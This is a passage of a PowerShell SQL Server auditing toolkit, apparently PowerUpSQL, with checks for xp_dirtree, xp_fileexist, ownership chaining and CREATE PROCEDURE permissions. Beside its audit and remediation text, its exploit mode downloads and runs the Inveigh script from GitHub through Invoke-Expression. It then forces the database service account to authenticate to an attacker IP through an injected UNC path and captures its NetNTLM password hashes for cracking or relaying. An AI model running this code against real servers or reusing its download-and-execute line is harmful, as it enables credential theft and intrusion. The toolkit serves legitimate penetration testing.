else\n                            {\n                                Write-Verbose -Message \"$Instance : - Inveigh could not be loaded.\"\n                                # Update status\n                                $Exploited = 'No'\n                                $Details = \"The $PrincipalName principal has EXECUTE privileges on the xp_dirtree procedure in the master database, but Inveigh could not be loaded so no password hashes could be recovered.\"\n                            }\n                        }\n                        else\n                        {\n                            # Update status\n                            $Exploited = 'No'\n                            $Details = \"The $PrincipalName principal has EXECUTE privileges on the xp_dirtree procedure in the master database.\"\n                        }\n                    }\n                    else\n                    {\n                        # Update status\n                        $IsExploitable  = 'No'\n                        $Details = \"The $PrincipalName principal has EXECUTE privileges the xp_dirtree procedure in the master database.\"\n                    }\n                }\n\n                # Add record\n                $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author)\n            }\n        }\n        else\n        {\n            Write-Verbose -Message \"$Instance : - No logins were found with the EXECUTE privilege on xp_dirtree.\"\n        }\n\n        # Status User\n        Write-Verbose -Message \"$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - XP_DIRTREE\"\n    }\n\n    End\n    {\n        # Return data\n        if ( -not $NoOutput)\n        {\n            Return $TblData\n        }\n    }\n}\n\n\n# ---------------------------------------\n# Invoke-SQLAuditPrivXpFileexist\n# ---------------------------------------\n# Author: Scott Sutherland\nFunction Invoke-SQLAuditPrivXpFileexist\n{\n    <#\n            .SYNOPSIS\n            Check if the current user has privileges to execute xp_fileexist extended stored procedure.\n            If exploit option is used, the script will inject a UNC path to the attacker's IP and capture\n            the SQL Server service account password hash using Inveigh.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER Exploit\n            Exploit vulnerable issues.\n            .PARAMETER AttackerIp\n            IP that the SQL Server service will attempt to authenticate to, and password hashes will be captured from.\n            .PARAMETER TimeOut\n            Number of seconds to wait for authentication from target SQL Server.\n            .EXAMPLE\n            PS C:\\> Invoke-SQLAuditPrivXpFileexist -Verbose -Instance SQLServer1\\STANDARDDEV2014 -AttackerIp 10.1.1.2\n\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceDomain -Verbose | Invoke-SQLAuditPrivXpFileexist -Verbose\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = \"Don't output anything.\")]\n        [string]$NoOutput,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Exploit vulnerable issues.')]\n        [switch]$Exploit,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'IP that the SQL Server service will attempt to authenticate to, and password hashes will be captured from.')]\n        [string]$AttackerIp,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Time in second to way for hash to be captured.')]\n        [int]$TimeOut = 5\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblData = New-Object -TypeName System.Data.DataTable\n        $null = $TblData.Columns.Add('ComputerName')\n        $null = $TblData.Columns.Add('Instance')\n        $null = $TblData.Columns.Add('Vulnerability')\n        $null = $TblData.Columns.Add('Description')\n        $null = $TblData.Columns.Add('Remediation')\n        $null = $TblData.Columns.Add('Severity')\n        $null = $TblData.Columns.Add('IsVulnerable')\n        $null = $TblData.Columns.Add('IsExploitable')\n        $null = $TblData.Columns.Add('Exploited')\n        $null = $TblData.Columns.Add('ExploitCmd')\n        $null = $TblData.Columns.Add('Details')\n        $null = $TblData.Columns.Add('Reference')\n        $null = $TblData.Columns.Add('Author')\n    }\n\n    Process\n    {\n        # Status User\n        Write-Verbose -Message \"$Instance : START VULNERABILITY CHECK: Excessive Privilege - xp_fileexist\"\n\n        # Test connection to server\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if(-not $TestConnection)\n        {\n            # Status user\n            Write-Verbose -Message \"$Instance : CONNECTION FAILED.\"\n            Write-Verbose -Message \"$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - xp_fileexist.\"\n            Return\n        }\n        else\n        {\n            Write-Verbose -Message \"$Instance : CONNECTION SUCCESS.\"\n        }\n\n        # Grab server information\n        # Grab server, login, and role information\n        $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n        $ComputerName = $ServerInfo.ComputerName\n        $CurrentLogin = $ServerInfo.CurrentLogin\n        $CurrentLoginRoles = Get-SQLServerRoleMember -Instance $Instance -Username $Username -Password $Password -Credential $Credential -PrincipalName $CurrentLogin  -SuppressVerbose\n        $CurrentPrincpalList = @()\n        $CurrentPrincpalList += $CurrentLogin\n        $CurrentPrincpalList += 'Public'\n        $CurrentLoginRoles | ForEach-Object -Process {\n            $CurrentPrincpalList += $_.RolePrincipalName\n        }\n\n        # --------------------------------------------\n        # Set function meta data for report output\n        # --------------------------------------------\n        if($Exploit)\n        {\n            $TestMode  = 'Exploit'\n        }\n        else\n        {\n            $TestMode  = 'Audit'\n        }\n        $Vulnerability = 'Excessive Privilege - Execute xp_fileexist'\n        $Description   = 'xp_fileexist is a native extended stored procedure that can be executed by members of the Public role by default in SQL Server 2000-2014. Xp_dirtree can be used to force the SQL Server service account to authenticate to a remote attacker.  The service account password hash can then be captured + cracked or relayed to gain unauthorized access to systems. This also means xp_dirtree can be used to escalate a lower privileged user to sysadmin when a machine or managed account isnt being used.  Thats because the SQL Server service account is a member of the sysadmin role in SQL Server 2000-2014, by default.'\n        $Remediation   = 'Remove EXECUTE privileges on the xp_fileexist procedure for non administrative logins and roles.  Example command: REVOKE EXECUTE ON xp_fileexist to Public'\n        $Severity      = 'Medium'\n        $IsVulnerable  = 'No'\n        $IsExploitable = 'No'\n        $Exploited     = 'No'\n        $ExploitCmd    = 'Crack the password hash offline or relay it to another system.'\n        $Details       = ''\n        $Reference     = 'https://blog.netspi.com/executing-smb-relay-attacks-via-sql-server-using-metasploit/'\n        $Author        = 'Scott Sutherland (@_nullbind), NetSPI 2016'\n\n        # -----------------------------------------------------------------\n        # Check for the Vulnerability\n        # Note: Typically a missing patch or weak configuration\n        # -----------------------------------------------------------------\n\n        # Get users and roles that execute xp_fileexist\n        $DirTreePrivs = Get-SQLDatabasePriv -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName master -SuppressVerbose | Where-Object -FilterScript {\n            $_.ObjectName -eq 'xp_fileexist' -and $_.PermissionName -eq 'EXECUTE' -and $_.statedescription -eq 'grant'\n        }\n\n        # Update vulnerable status\n        if($DirTreePrivs)\n        {\n            # Status user\n            Write-Verbose -Message \"$Instance : - The $PrincipalName principal has EXECUTE privileges on xp_fileexist.\"\n\n            $IsVulnerable  = 'Yes'\n            $DirTreePrivs |\n            ForEach-Object {\n                $PrincipalName = $DirTreePrivs.PrincipalName\n\n                # Check if current login can exploit\n                $CurrentPrincpalList |\n                ForEach-Object {\n                    $PrincipalCheck = $_\n\n                    if($PrincipalName -eq $PrincipalCheck)\n                    {\n                        $IsExploitable  = 'Yes'\n\n                        # Check if the current process has elevated privs\n                        # https://msdn.microsoft.com/en-us/library/system.security.principal.windowsprincipal(v=vs.110).aspx\n                        $CurrentIdentity = [System.Security.Principal.WindowsIdentity]::GetCurrent()\n                        $prp = New-Object -TypeName System.Security.Principal.WindowsPrincipal -ArgumentList ($CurrentIdentity)\n                        $adm = [System.Security.Principal.WindowsBuiltInRole]::Administrator\n                        $IsAdmin = $prp.IsInRole($adm)\n                        if (-not $IsAdmin)\n                        {\n                            Write-Verbose -Message \"$Instance : - You do not have Administrator rights. Run this function as an Administrator in order to load Inveigh.\"\n                            $IAMADMIN = 'No'\n                        }\n                        else\n                        {\n                            Write-Verbose -Message \"$Instance : - You have Administrator rights. Inveigh will be loaded.\"\n                            $IAMADMIN = 'Yes'\n                        }\n\n                        # Get IP of current system\n                        if(-not $AttackerIp)\n                        {\n                            $AttackerIp = (Test-Connection -ComputerName 127.0.0.1 -Count 1 |\n                            Select-Object -ExpandProperty Ipv4Address |\n                            Select-Object -Property IPAddressToString -ExpandProperty IPAddressToString)\n\n                            if($AttackerIp -eq '127.0.0.1')\n                            {\n                                $AttackerIp = Get-WmiObject -Class win32_networkadapterconfiguration -Filter \"ipenabled = 'True'\" -ComputerName $env:COMPUTERNAME |\n                                Select-Object -First 1 -Property @{\n                                    Name       = 'IPAddress'\n                                    Expression = {\n                                        [regex]$rx = '(\\d{1,3}(\\.?)){4}'; $rx.matches($_.IPAddress)[0].Value\n                                    }\n                                } |\n                                Select-Object -Property IPaddress -ExpandProperty IPAddress -First 1\n                            }\n                        }\n\n                        # Check for exploit flag\n                        if($IAMADMIN -eq 'Yes')\n                        {\n                            # Attempt to load Inveigh from file\n                            #$InveighSrc = Get-Content .\\scripts\\Inveigh.ps1 -ErrorAction SilentlyContinue\n                            #Invoke-Expression($InveighSrc)\n\n                            # Attempt to load Inveigh via reflection\n                            Invoke-Expression -Command (New-Object -TypeName system.net.webclient).downloadstring('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1')\n\n                            $TestIt = Test-Path -Path Function:\\Invoke-Inveigh\n                            if($TestIt -eq 'True')\n                            {\n                                Write-Verbose -Message \"$Instance : - Inveigh loaded.\"\n\n                                # Get IP of SQL Server instance\n                                $InstanceIP = [System.Net.Dns]::GetHostAddresses($ComputerName)\n\n                                # Start sniffing for hashes from that IP\n                                Write-Verbose -Message \"$Instance : - Start sniffing...\"\n                                $null = Invoke-Inveigh -HTTP N -NBNS Y -MachineAccounts Y -WarningAction SilentlyContinue -IP $AttackerIp\n\n                                # Randomized 5 character file name\n                                $path = (-join ((65..90) + (97..122) | Get-Random -Count 5 | % {[char]$_}))\n\n                                # Sent unc path to attacker's Ip\n                                Write-Verbose -Message \"$Instance : - Inject UNC path to \\\\$AttackerIp\\$path...\"\n                                $null = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query \"xp_fileexist '\\\\$AttackerIp\\$path'\" -TimeOut 10 -SuppressVerbose\n\n\t\t\t\t\t\t\t\t# Sleep for $Timeout seconds to ensure that slow connections make it back to the listener\n\t\t\t\t\t\t\t\tWrite-Verbose -Message \"$Instance : - Sleeping for $TimeOut seconds to ensure the hash comes back\"\n                                Start-Sleep -s $TimeOut\n\n                                # Stop sniffing and print password hashes\n                                $null = Stop-Inveigh\n                                Write-Verbose -Message \"$Instance : - Stopped sniffing.\"\n\n                                $HashType = ''\n                                $Hash = ''\n\n                                [string]$PassCleartext = Get-Inveigh -Cleartext Y\n                                if($PassCleartext)\n                                {\n                                    $HashType = 'Cleartext'\n                                    $Hash = $PassCleartext\n                                }\n\n                                [string]$PassNetNTLMv1 = Get-Inveigh -NTLMv1 Y\n                                if($PassNetNTLMv1)\n                                {\n                                    $HashType = 'NetNTLMv1'\n                                    $Hash = $PassNetNTLMv1\n                                }\n\n                                [string]$PassNetNTLMv2 = Get-Inveigh -NTLMv2 Y\n                                if($PassNetNTLMv2)\n                                {\n                                    $HashType = 'NetNTLMv2'\n                                    $Hash = $PassNetNTLMv2\n                                }\n\n                                if($Hash)\n                                {\n                                    # Update Status\n                                    Write-Verbose -Message \"$Instance : - Recovered $HashType hash:\"\n                                    Write-Verbose -Message \"$Instance : - $Hash\"\n                                    $Exploited = 'Yes'\n                                    $Details = \"The $PrincipalName principal has EXECUTE privileges on xp_fileexist procedure in the master database. Recovered password hash! Hash type = $HashType;Hash = $Hash\"\n                                }\n                                else\n                                {\n                                    # Update Status\n                                    $Exploited = 'No'\n                                    $Details = \"The $PrincipalName principal has EXECUTE privileges on xp_fileexist procedure in the master database.  xp_fileexist Executed, but no password hash was recovered.\"\n                                }\n\n                                # Clear inveigh cache\n                                $null = Clear-Inveigh\n                            }\n                            else\n                            {\n                                Write-Verbose -Message \"$Instance : - Inveigh could not be loaded.\"\n                                # Update status\n                                $Exploited = 'No'\n                                $Details = \"The $PrincipalName principal has EXECUTE privileges on xp_fileexist procedure in the master database, but Inveigh could not be loaded so no password hashes could be recovered.\"\n                            }\n                        }\n                        else\n                        {\n                            # Update status\n                            $Exploited = 'No'\n                            $Details = \"The $PrincipalName principal has EXECUTE privileges on xp_fileexist procedure in the master database.\"\n                        }\n                    }\n                    else\n                    {\n                        # Update status\n                        $IsExploitable  = 'No'\n                        $Details = \"The $PrincipalName principal has EXECUTE privileges on xp_fileexist procedure in the master database.\"\n                    }\n                }\n\n                # Add record\n                $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author)\n            }      \n        }else{\n            Write-Verbose -Message \"$Instance : - No logins were found with the EXECUTE privilege on xp_fileexist.\"\n        }\n    }\n\n    End\n    {\n        # Status User\n        Write-Verbose -Message \"$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - xp_fileexist\"\n\n        # Return data\n        if ( -not $NoOutput)\n        {\n            Return $TblData\n        }\n    }\n}\n\n\n# ---------------------------------------\n# Invoke-SQLAuditPrivDbChaining\n# ---------------------------------------\n# Author: Scott Sutherland\nFunction Invoke-SQLAuditPrivDbChaining\n{\n    <#\n            .SYNOPSIS\n            Check if data ownership chaining is enabled at the server or databases levels.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER NoDefaults\n            Don't return information for default databases.\n            .PARAMETER NoOutput\n            Don't return output.\n            .PARAMETER Exploit\n            Exploit vulnerable issues.\n            .EXAMPLE\n            PS C:\\> Invoke-SQLAuditPrivDbChaining -Instance SQLServer1\\STANDARDDEV2014\n\n            ComputerName  : NETSPI-283-SSU\n            Instance      : NETSPI-283-SSU\\STANDARDDEV2014\n            Vulnerability : Excessive Privilege - Database Ownership Chaining\n            Description   : Ownership chaining was found enabled at the server or database level.  Enabling ownership chaining can lead to unauthorized access to database resources.\n            Remediation   : Configured the affected database so the 'is_db_chaining_on' flag is set to 'false'.  A query similar to 'ALTER DATABASE Database1 SET DB_CHAINING ON' is used\n            enable chaining.  A query similar to 'ALTER DATABASE Database1 SET DB_CHAINING OFF;' can be used to disable chaining.\n            Severity      : Low\n            IsVulnerable  : Yes\n            IsExploitable : No\n            Exploited     : No\n            ExploitCmd    : There is not exploit available at this time.\n            Details       : The database testdb was found configured with ownership chaining enabled.\n            Reference     : https://technet.microsoft.com/en-us/library/ms188676(v=sql.105).aspx,https://msdn.microsoft.com/en-us/library/bb669059(v=vs.110).aspx\n            Author        : Scott Sutherland (@_nullbind), NetSPI 2016\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceDomain | Invoke-SQLAuditPrivDbChaining -Verbose\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Only select non default databases.')]\n        [switch]$NoDefaults,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = \"Don't output anything.\")]\n        [switch]$NoOutput,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Exploit vulnerable issues.')]\n        [switch]$Exploit\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblData = New-Object -TypeName System.Data.DataTable\n        $null = $TblData.Columns.Add('ComputerName')\n        $null = $TblData.Columns.Add('Instance')\n        $null = $TblData.Columns.Add('Vulnerability')\n        $null = $TblData.Columns.Add('Description')\n        $null = $TblData.Columns.Add('Remediation')\n        $null = $TblData.Columns.Add('Severity')\n        $null = $TblData.Columns.Add('IsVulnerable')\n        $null = $TblData.Columns.Add('IsExploitable')\n        $null = $TblData.Columns.Add('Exploited')\n        $null = $TblData.Columns.Add('ExploitCmd')\n        $null = $TblData.Columns.Add('Details')\n        $null = $TblData.Columns.Add('Reference')\n        $null = $TblData.Columns.Add('Author')\n    }\n\n    Process\n    {\n        # Status User\n        Write-Verbose -Message \"$Instance : START VULNERABILITY CHECK: Excessive Privilege - Database Ownership Chaining\"\n\n        # Test connection to server\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if(-not $TestConnection)\n        {\n            # Status user\n            Write-Verbose -Message \"$Instance : CONNECTION FAILED.\"\n            Write-Verbose -Message \"$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - Database Ownership Chaining.\"\n            Return\n        }\n        else\n        {\n            Write-Verbose -Message \"$Instance : CONNECTION SUCCESS.\"\n        }\n\n        # Grab server information\n        $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n        $CurrentLogin = $ServerInfo.CurrentLogin\n        $ComputerName = $ServerInfo.ComputerName\n\n        # --------------------------------------------\n        # Set function meta data for report output\n        # --------------------------------------------\n        if($Exploit)\n        {\n            $TestMode  = 'Exploit'\n        }\n        else\n        {\n            $TestMode  = 'Audit'\n        }\n        $Vulnerability = 'Excessive Privilege - Database Ownership Chaining'\n        $Description   = 'Ownership chaining was found enabled at the server or database level.  Enabling ownership chaining can lead to unauthorized access to database resources.'\n        $Remediation   = \"Configured the affected database so the 'is_db_chaining_on' flag is set to 'false'.  A query similar to 'ALTER DATABASE Database1 SET DB_CHAINING ON' is used enable chaining.  A query similar to 'ALTER DATABASE Database1 SET DB_CHAINING OFF;' can be used to disable chaining.\"\n        $Severity      = 'Low'\n        $IsVulnerable  = 'No'\n        $IsExploitable = 'No'\n        $Exploited     = 'No'\n        $ExploitCmd    = 'There is not exploit available at this time.'\n        $Details       = ''\n        $Reference     = 'https://technet.microsoft.com/en-us/library/ms188676(v=sql.105).aspx,https://msdn.microsoft.com/en-us/library/bb669059(v=vs.110).aspx '\n        $Author        = 'Scott Sutherland (@_nullbind), NetSPI 2016'\n\n        # -----------------------------------------------------------------\n        # Check for the Vulnerability\n        # Note: Typically a missing patch or weak configuration\n        # -----------------------------------------------------------------\n\n        # Select links configured with static credentials\n\n        if($NoDefaults)\n        {\n            $ChainDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -NoDefaults -SuppressVerbose | Where-Object -FilterScript {\n                $_.is_db_chaining_on -eq 'True'\n            }\n        }\n        else\n        {\n            $ChainDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n                $_.is_db_chaining_on -eq 'True'\n            }\n        }\n\n        # Update vulnerable status\n        if($ChainDatabases)\n        {\n            $IsVulnerable  = 'Yes'\n            $ChainDatabases |\n            ForEach-Object -Process {\n                $DatabaseName = $_.DatabaseName\n\n                Write-Verbose -Message \"$Instance : - The database $DatabaseName has ownership chaining enabled.\"\n                $Details = \"The database $DatabaseName was found configured with ownership chaining enabled.\"\n                $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author)\n            }\n        }\n        else\n        {\n            Write-Verbose -Message \"$Instance : - No non-default databases were found with ownership chaining enabled.\"\n        }\n\n        # Check for server wide setting\n        $ServerCheck = Get-SQLServerConfiguration -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Name -like '*chain*' -and $_.config_value -eq 1\n        }\n        if($ServerCheck)\n        {\n            $IsVulnerable  = 'Yes'\n            Write-Verbose -Message \"$Instance : - The server configuration 'cross db ownership chaining' is set to 1.  This can affect all databases.\"\n            $Details = \"The server configuration 'cross db ownership chaining' is set to 1.  This can affect all databases.\"\n            $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author)\n        }\n\n        # -----------------------------------------------------------------\n        # Check for exploit dependancies\n        # Note: Typically secondary configs required for dba/os execution\n        # -----------------------------------------------------------------\n        # $IsExploitable = \"No\" or $IsExploitable = \"Yes\"\n        # Check if the link is alive and verify connection + check if sysadmin\n\n\n        # -----------------------------------------------------------------\n        # Exploit Vulnerability\n        # Note: Add the current user to sysadmin fixed server role\n        # -----------------------------------------------------------------\n        # $Exploited = \"No\" or $Exploited     = \"Yes\"\n        # select * from openquery(\"server\\intance\",'EXEC xp_cmdshell whoami WITH RESULT SETS ((output VARCHAR(MAX)))')\n        # Also, recommend link crawler module\n\n\n        # Status User\n        Write-Verbose -Message \"$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - Database Ownership Chaining\"\n    }\n\n    End\n    {\n        # Return data\n        if ( -not $NoOutput)\n        {\n            Return $TblData\n        }\n    }\n}\n\n\n# ---------------------------------------\n# Invoke-SQLAuditPrivCreateProcedure\n# ---------------------------------------\n# Author: Scott Sutherland\nFunction Invoke-SQLAuditPrivCreateProcedure\n{\n    <#\n            .SYNOPSIS\n            Check if the current login has the CREATE PROCEDURE permission.  Attempt to leverage to obtain sysadmin privileges.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER NoOutput\n            Don't output anything.\n            .PARAMETER Exploit\n            Exploit vulnerable issues\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceLocal | Invoke-SQLAuditPrivCreateProcedure -Username evil -Password Password123!\n\n            ComputerName  : SQLServer1\n            Instance      : SQLServer1\\STANDARDDEV2014\n            Vulnerability : PERMISSION - CREATE PROCEDURE\n            Description   : The login has privileges to create stored procedures in one or more databases.  This may allow the login to escalate privileges within the database.\n            Remediation   : If the permission is not required remove it.  Permissions are granted with a command like: GRANT CREATE PROCEDURE TO user, and can be removed with a\n            command like: REVOKE CREATE PROCEDURE TO user.\n            Severity      : Medium\n            IsVulnerable  : Yes\n            IsExploitable : No\n            Exploited     : No\n            ExploitCmd    : No exploit is currently available that will allow evil to become a sysadmin.\n            Details       : The evil principal has the CREATE PROCEDURE permission in the testdb database.\n            Reference     : https://msdn.microsoft.com/en-us/library/ms187926.aspx?f=255&MSPPError=-2147217396\n            Author        : Scott Sutherland (@_nullbind), NetSPI 2016\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = \"Don't output anything.\")]\n        [string]$NoOutput,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Exploit vulnerable issues.')]\n        [switch]$Exploit\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblData = New-Object -TypeName System.Data.DataTable\n        $null = $TblData.Columns.Add('ComputerName')\n        $null = $TblData.Columns.Add('Instance')\n        $null = $TblData.Columns.Add('Vulnerability')\n        $null = $TblData.Columns.Add('Description')\n        $null = $TblData.Columns.Add('Remediation')\n        $null = $TblData.Columns.Add('Severity')\n        $null = $TblData.Columns.Add('IsVulnerable')\n        $null = $TblData.Columns.Add('IsExploitable')\n        $null = $TblData.Columns.Add('Exploited')\n        $null = $TblData.Columns.Add('ExploitCmd')\n        $null = $TblData.Columns.Add('Details')\n        $null = $TblData.Columns.Add('Reference')\n        $null = $TblData.Columns.Add('Author')\n    }\n\n    Process\n    {\n        # Status User\n        Write-Verbose -Message \"$Instance : START VULNERABILITY CHECK: PERMISSION - CREATE PROCEDURE\"\n\n        # Test connection to server\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if(-not $TestConnection)\n        {\n            # Status user\n            Write-Verbose -Message \"$Instance : CONNECTION FAILED\"\n            Write-Verbose -Message \"$Instance : COMPLETED VULNERABILITY CHECK: PERMISSION - CREATE PROCEDURE\"\n            Return\n        }\n        else\n        {\n            Write-Verbose -Message \"$Instance : CONNECTION SUCCESS\"\n        }\n\n        # Grab server, login, and role information\n        $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n        $ComputerName = $ServerInfo.ComputerName\n        $CurrentLogin = $ServerInfo.CurrentLogin\n        $CurrentLoginRoles = Get-SQLServerRoleMember -Instance $Instance  -Username $Username -Password $Password -Credential $Credential -PrincipalName $CurrentLogin -SuppressVerbose\n        $CurrentPrincpalList = @()\n        $CurrentPrincpalList += $CurrentLogin\n        $CurrentPrincpalList += 'Public'\n        $CurrentLoginRoles |\n        ForEach-Object -Process {\n            $CurrentPrincpalList += $_.RolePrincipalName\n        }\n\n        # --------------------------------------------\n        # Set function meta data for report output\n        # --------------------------------------------\n        if($Exploit)\n        {\n            $TestMode  = 'Exploit'\n        }\n        else\n        {\n            $TestMode  = 'Audit'\n        }\n        $Vulnerability = 'PERMISSION - CREATE PROCEDURE'\n        $Description   = 'The login has privileges to create stored procedures in one or more databases.  This may allow the login to escalate privileges within the database.'\n        $Remediation   = 'If the permission is not required remove it.  Permissions are granted with a command like: GRANT CREATE PROCEDURE TO user, and can be removed with a command like: REVOKE CREATE PROCEDURE TO user'\n        $Severity      = 'Medium'\n        $IsVulnerable  = 'No'\n        $IsExploitable = 'No'\n        $Exploited     = 'No'\n        $ExploitCmd    = \"No exploit is currently available that will allow $CurrentLogin to become a sysadmin.\"\n        $Details       = ''\n        $Dependancies = ''\n        $Reference     = 'https://msdn.microsoft.com/en-us/library/ms187926.aspx?f=255&MSPPError=-2147217396'\n        $Author        = 'Scott Sutherland (@_nullbind), NetSPI 2016'\n\n        # -----------------------------------------------------------------\n        # Check for the Vulnerability\n        # Note: Typically a missing patch or weak configuration\n        # -----------------------------------------------------------------\n\n        # Get all CREATE PROCEDURE grant permissions for all accessible databases\n        $Permissions = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -HasAccess -SuppressVerbose | Get-SQLDatabasePriv -Instance $Instance -Username $Username -Password $Password -Credential $Credential -PermissionName 'CREATE PROCEDURE'\n\n        if($Permissions)\n        {\n            # Iterate through each current login and their associated roles\n            $CurrentPrincpalList|\n            ForEach-Object -Process {\n                # Check if they have the CREATE PROCEDURE grant\n                $CurrentPrincipal = $_\n                $Permissions |\n                ForEach-Object -Process {\n                    $AffectedPrincipal = $_.PrincipalName\n                    $AffectedDatabase = $_.DatabaseName\n\n                    if($AffectedPrincipal -eq $CurrentPrincipal)\n                    {\n                        # Set flag to vulnerable\n                        $IsVulnerable  = 'Yes'\n                        Write-Verbose -Message \"$Instance : - The $AffectedPrincipal principal has the CREATE PROCEDURE permission in the $AffectedDatabase database.\"\n                        $Details = \"The $AffectedPrincipal principal has the CREATE PROCEDURE permission in the $AffectedDatabase database.\"\n\n                        # -----------------------------------------------------------------\n                        # Check for exploit dependancies\n                        # Note: Typically secondary configs required for dba/os execution\n                        # -----------------------------------------------------------------\n                        $HasAlterSchema = Get-SQLDatabasePriv -Instance $Instance -Username $Username -Password $Password -Credential $Credential -PermissionName 'ALTER' -PermissionType 'SCHEMA' -PrincipalName $CurrentPrincipal -DatabaseName $AffectedDatabase  -SuppressVerbose\n                        if($HasAlterSchema)\n                        {\n                            $IsExploitable = 'Yes'\n                            $Dependancies = \" $CurrentPrincipal also has ALTER 